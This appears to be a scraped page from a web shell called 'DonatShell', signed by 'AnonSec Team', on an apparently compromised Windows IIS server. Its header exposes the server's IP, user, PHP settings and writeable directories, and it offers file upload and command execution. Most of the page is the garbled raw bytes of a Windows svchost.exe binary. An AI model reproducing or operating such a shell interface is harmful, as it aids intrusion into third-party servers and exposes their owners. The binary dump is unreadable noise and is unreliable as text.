DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/SysWOW64/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/SysWOW64//svchost.exe
MZ@	!L!This program cannot be run in DOS mode.

$rǤǤǤܘĤ܉ƤǤ܏֤ܟ٤܈Ƥ܍ƤRichǤPEL[J	:!PЇ@@>`p|I8@7@p=@.text9: `.dataP>@.rsrc`
D@@.relocpN@Bo[JX[Jc[Jc[J[J[J[J[J[J[Jmsvcrt.dllAPI-MS-Win-Core-ProcessThreads-L1-1-0.dllKERNEL32.dllNTDLL.DLLAPI-MS-Win-Security-Base-L1-1-0.dllAPI-MS-WIN-Service-Core-L1-1-0.dllAPI-MS-WIN-Service-winsvc-L1-1-0.dllRPCRT4.dll|Noouo6oQoowooo'>oao(o'o'o7oPww@#
wwwww7wvww<ww^wfwB1w(wwvwDw5+wwww@kww~kww)wwuw7wQwwwuwww*ww}^wwLww]w|www w www$w:wwwwUwwwbwZw1w

a
|
s
ˑ
s

OG}ww2wwwʮw$w)wwUQQSV5WMQ3WPhPhEE֋؅u.EPWSuu֋؅uuWPh8u֋؃7}5tuփ}tu_^[ParametersSystem\CurrentControlSet\ServicesUuj5pP]USVW3ۿPWE]]uNEP6u0EPEPEPSh@uu}u}u9^tKW9]_^[t	uServiceDllUnloadOnStopEPF]ptFplFXuS뀐USVWPWuFX`Wu6vV_^[]UEVW3hPuuEuE395TPv)S3ۡtP4uF;5TPr[hP39ulP;PU9uN!huMuuUhu7W_^efUP
PЃtuQP8jtPlj̋E;EuV9}tQj[uWE;MQPEPWuu֋;uEMEMuj
[SWu=VVVVCSuVV׉E;t6PVEE;t!VVuuPSuVVׅ EMu_[EkPEPEPtPPW39]t9]t9lPbEEtP<@U;9]9lPGU`@P3ʼnEES]VuWE3jYDž 33;ffF;]P6;ih
W3fPWPjhPDž
ӅjX9f?hPW=׍PPPjh0Dž
ӅYE<3fVP(u:f9VPtjHFFPjh/~t5FuSPvjhv39t9f9_^[gM3SvchostPushServiceGlobalsServiceMainServiceMainServiceManifestServiceDllUQSVuEPv3!]FujPvtXFuPd؅tEuj^[;
@PVÐUuu5pP]ut69]>}G/9us9uNeUQeSVhP5xPxP;t%W=uuvׅ6e;u_hPE^[u吐UUt/Vpf@@fu+@PRPRhh^]USV5Wuu֋؍;D Pjtd?QuFTPFVZPuvKEPWF|PxPF0W5|P_^[]E쐐%UQEV30EPuuuE;E^UEPuuuu	]UQQESV5W38E8EPWEPWu}u֋;_^[UQV3W3u9u9u9u9uShP95TP3ۡtP4utF;5TPruk5tPtj9~uej[SSuEjWhuwMzEFFhP}[HE_^E
jWX쐐LUhPP5HUPPhPhPhPLPÐh73Ð%h9d5D$l$l$+SVW@P1E3PeuEEEEdÐ3ÐU@PeeSWN@;VEPu3uL3P33EPE3E3;t@Pt5@P։5DP^_[þO@搐UQQS]VhPjsuL3E;uP;f90EPhVsu
E^[=tPti=TPt`VWPWTPPjt,39TPv"3ɋtPD@;TPrW_^3ÐUEpP]FFf;jKYf;t#FFf;jkYf;uGGEFFUQS39]=VWutF<Pj
;VuG<P]7wf9t&j Yf;tj	Yf;tFFf9uf9t3fFFw{f;j Yf;j	Yf;
f;t`j-Yf;j/Yf;
j"Zf;f9t#j Zf;tj	Zf;tFFf9uf99]tE]t39_G;l_^[UVu3;usu
tу^]Ðjh!u3ۉ]dp]俀PSVWp;3FhP;hPux5hPh!h!qYYhP;uh!h!YYhP9]uSWx9XU5P5P5Pd5U럐9"qn11MZf9<8PEu|Hpxtvf39jHPP,
`P
dPYY0
TU4
PU/=DU233룐hh YYÐUQS3VW]h#9]MQhSPh;EPuuGu;hP5PTPf9tTPVtF萐Software\Microsoft\Windows NT\CurrentVersion\SvchostTPkPjtP;t5Pf9t7VtFhP};_^[3ÐUjtP!t@\f
jX]ËE]Ðjh$3Mt:t5!EMZf9u!Q<|s
E8PEA
E%11Md
Y__^[]QÐUVWhu:3jP!xPhP|PxPhPWWh%< P3t.VuTHtV9F8uV_^]5@ULRH:6&ű@USVuF3W3C;FF0;G
d@0p,;t	pd9~4WWSW_^[]%\PhP$ÐUVud5PF0jpM^uuP3]9uBXPuw`
XPXPuQC
XPjdjlP&
PlP
PHlP
PHlP
PHlP
PHlP
PHlP
PHlP
PHlP
PH lP
QH$lP
QH(lP
QH,lP
QH0lP
QH4lP
 QH8lP
$QH<lP
(QH@lP
,QHDlP@Ho=lP@Lr;lP@P;lP@`AÐVW3jTTPPT7|Ij0\Tr3`UdU5P|
@r3_^øUQQd@0S VpWuu8GPPjVEuuPu6EW6M3_^[%p%tPPEPh+ukuEC9sEPhh+uGCEPh@+u'CEPh+uRC0EPjh*uujh*uEPh`*uEPh@*uuSystemCriticalDefaultRpcStackSizeDeferredCoInitializeSecurityServicesCoInitializeSecurityAppIDAuthenticationCapabilitiesImpersonationLevelAuthenticationLevelCoInitializeSecurityParamUQW}EPWEPjuEut_}t
RRS&}jWVjjY}EEd,E$]tu7=U,EeSXVpW}+x@+ًUEB}}uu2E}tE0_^[%dPQRPh=?ZY^8SN QvvvPaUSVEPE3P@uuu|W3G9}ujVP;|cVuVuuVVjuP;|EEPh4.WVh$.P;|)EWWPQ;|9=TPEPQu_uu3;^[KF[FUEV30EW0EPj_WuuuDPH#SEPVV5Xju֋huӉEz+EPjjjuօuӉEz
uEDPjEejxP\EPuWjuXEPuVjuXj7uPj6uTh0`Vj@X})jVWdtch0jjWLtOujWjVHt<Eee0E8[}_^t	u\uuEECEC0E
j
PEM3ۉ]9x@;
f98g.MQj,W	u	~t=u2jjVhtEE	puS	;u3Fu8h|jYPEhXU(YiSjSXUZU9HPu7PE	MPQZYYËeE࣠U39HPuP9Uu8EU/Á39xhY3@Ëe3EfY3@]ÅУDP2uhhluvׅ!E0F0/ECEC,W{ WuP}	,7ue_:EC4s3gjWPSWS(7`39tPuIS39TPv2tP4WtF;5TPsߡtPkD3W|Gf9uEH8uBSoftware\Microsoft\Windows NT\CurrentVersion\MgdSvchostMVpf@@fuee+DEEPjuM5P5P4^}jX9uꋝf;thPSS=P:PEHf\tf/t
iፄEUPQhCPu
hF@ttPFxCW{9]GH;@8SP RpppQu]]E[5@U@UO9uuu@uu03FFf;qj"Zf;FFf;t3fFFoWZ3jDPjW.]hE!cuhEHhE'}EE
9uujY,73tuEjPQ3ju@EH@P79UE8csmu+xu%@= t=!t="t=@u(3]%UMMZf9t3]ËA<8PEu3ҹf9H‹]ÐUEH<ASVq3WDv}H;r	X;r
B(;r3_^[]Ðjh8eVbYt=E+PVYYt+@$ЃE E3=ËeE3Ð88%Uuuuuhh@P
]Ð%$U(0R
,R(R$R5 R=RHR
<RRR%R-R@RE4RE8REDRQ8R<Q0Q	4Q@PDPjh:h	DP@0QQUeee3@h:uEEEE0ExtMQPpU]%0%`%h%lPuV3ʅtf9tFFJuu
^t|+ʉÃ'ÐUW3t;Uv
|
E'_]USVW؋33t!9EtftfAACCNMGuuIIO3fMt9_^[]UVWjjuPV
\PujVW_^]UVWjjuPV
\PujVW_^]UUjXtv
|EMhj]US]VuWWSEx|EW+ЍCEj_^[]UEPf@@fuV+WtVjXuuh\=VW>}W
WuVW]}5WWjWj
hH=tujjuWV_^]ncacn_np\PIPE\UVWPVuuu*\P=\Pujh90ju3VW_^] >PP,>ole32.dll@>R>f>~>CoInitializeExCoCreateInstanceCoInitializeSecurity3CLSIDFromString@@T@?@l@?X A?\A?HAx?lAP?xAD?RPCRT4.dllAPI-MS-WIN-Service-winsvc-L1-1-0.dllAPI-MS-WIN-Service-Core-L1-1-0.dllAPI-MS-Win-Security-Base-L1-1-0.dllntdll.dllKERNEL32.dllAPI-MS-Win-Core-ProcessThreads-L1-1-0.dllmsvcrt.dllAAAAAABB$B2BLB`BrBBBBBBBBCCC6CHCXCfCCCCCCCDD*DFDZDlD~DDDDDDDDEE*E:EJEfExEEEEEEF"F.F:FPF\FnFFFFFFFG&GDGTGfGzGGGGGGH,H<HLHjH~HHHHHII8INIhI__wgetmainargsb_exitj_XcptFilterexit_initterm_amsg_exit__setusermatherrmemcpy'_controlfpY_except_handler4_common7?terminate@@YAXXZ__set_app_type__p__fmode__p__commode_cexit*TerminateProcess
GetCurrentProcessOpenProcessTokenGetCurrentProcessId
GetCurrentThreadIdCLocalAllocRCloseHandleDelayLoadFailureHookDGetProcAddressGetLastErroraFreeLibraryInterlockedCompareExchange<LoadLibraryExAInterlockedExchangeSleepSetUnhandledExceptionFilterGetModuleHandleAQueryPerformanceCounterGetTickCountxGetSystemTimeAsFileTimeUnhandledExceptionFilterDeactivateActCtx=LoadLibraryExWActivateActCtx8LeaveCriticalSection>lstrcmpWEnterCriticalSectionRegCloseKeyRegOpenKeyExWHeapSetInformationAlstrcmpiWJlstrlenW,LCMapStringWRegQueryValueExWReleaseActCtxxCreateActCtxWExpandEnvironmentStringsWGetCommandLineWExitProcess|SetProcessAffinityUpdateModeRegDisablePredefinedCacheExInitializeCriticalSectionIGetProcessHeapUSetErrorModeRegisterWaitForSingleObjectExGLocalFreeHeapFree
WideCharToMultiByteHeapAlloccRtlAllocateHeapRtlLengthRequiredSidRtlSubAuthoritySidRtlInitializeSidRtlCopySidRtlSubAuthorityCountSidRtlInitializeCriticalSectionRtlSetProcessIsCriticalRtlImageNtHeaderRtlUnhandledExceptionFilter9EtwEventWrite5EtwEventEnabled7EtwEventRegisterGRtlFreeHeap[SetSecurityDescriptorDaclAddAccessAllowedAce]SetSecurityDescriptorOwner\SetSecurityDescriptorGroup:GetTokenInformation@InitializeSecurityDescriptor-GetLengthSid?InitializeAclStartServiceCtrlDispatcherWSetServiceStatusRegisterServiceCtrlHandlerWRpcMgmtSetServerStackSize>I_RpcMapWin32StatusRpcServerUnregisterIfRpcMgmtWaitServerListenRpcMgmtStopServerListeningRpcServerUnregisterIfExRpcServerRegisterIfRpcServerUseProtseqEpWRpcServerListen[J$I=[J5~
I=~RSDS NO>>Kjsvchost.pdb-9)C):N@DPPPPPPPPPP PQQQ!QPQ Q!Q"Q# Q$$Q%(Q&,Q'(@Xp			Hgc`MUI<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="x86"
    name="Microsoft.Windows.Services.SvcHost"
    type="win32"
/>
<description>Host Process for Windows Services</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="asInvoker"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
</assembly>

4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft Corporationl"FileDescriptionHost Process for Windows Servicesl&FileVersion6.1.7600.16385 (win7_rtm.090713-1255)8InternalNamesvchost.exe.LegalCopyright Microsoft Corporation. All rights reserved.@OriginalFilenamesvchost.exej%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	ˮ~^1Vԅ,M?3EohMUIMUIen-US111222223
3&373}33333344$4.4:4L4T4Z4j444444 5(5556)6<6D6[6~6/7J777_88889999999L:R:X:]:h:::::N;X;];c;o;u;;<v<|<<<<<<<<==:=?=E=J=O=T=Y=_=g=r=x=====>> >(>4>F>N>V>x>>>>>>>>??*?4?=?W?? |1'101@1M1W1\1a1u1~11111111111122!2,222d2p2v2}22222222	3+383>3D3J3U3\3333444D4v444
555#5.53585=5C5I5N5U5[5n5566%696?6E6a6p666666677777'7-757;7C7I7Q7W7_7e7m7s7{7777777777777777777888888$888?8V8\8q8w8}888889*959:9D9R9v99999::5:;<<<<<==%=======>r>y>>>??9?N?c?p?v????????0161N1[1a1j111111111 262C22222223333(3;34
44x44445!5\555J6Q6a6z66667|7777j8x88889909@9F9L9R9X9^9d9j9p9v9|9999999999999999:
:::=:Y:h:}:::::;;;;;;;;;;;;;;;<<<<<
==+=4=;=w=~======P@0000P4`4p44444444455 505`5h5p5x55555

Anon7 - 2022
AnonSec Team